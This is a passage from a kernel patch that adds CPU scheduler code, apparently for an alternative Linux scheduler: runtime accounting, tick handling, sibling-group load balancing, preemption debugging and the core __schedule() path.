++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU, it can wake to another CPU than it
++ * blocked on. This means the per CPU IO-wait number is meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
++
++/*
++ * Return accounted runtime for the task.
++ * Return separately the current's pending runtime that have not been
++ * accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have a optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks have less than RESCHED_NS of time slice left they will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		arch_scale_freq_tick();
++
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger slibing group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq= cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&\
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&\
++	      !is_migration_disabled(curr) && (!rq->active_balance);
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - slibing group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only cpu in slibing idle group will do the checking and then
++	 * find potential cpus which can migrate the current running task
++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&\
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too much is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++	int os;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	/* There cannot be competing actions, but don't rely on stop-machine. */
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
++	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
++	/* Don't cancel, as this would mess up the state machine. */
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
++
++/*
++ * If the value passed in equals to the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
++	    && in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	check_panic_on_warn("scheduling while atomic");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_idle_mask->bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired as there's no
++ * point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outmost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* by passing sched_feat(HRTICK) checking which Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev_state & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_preempt_mask(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (have scheduled out non-voluntarily) by making sure that all
++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disable() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
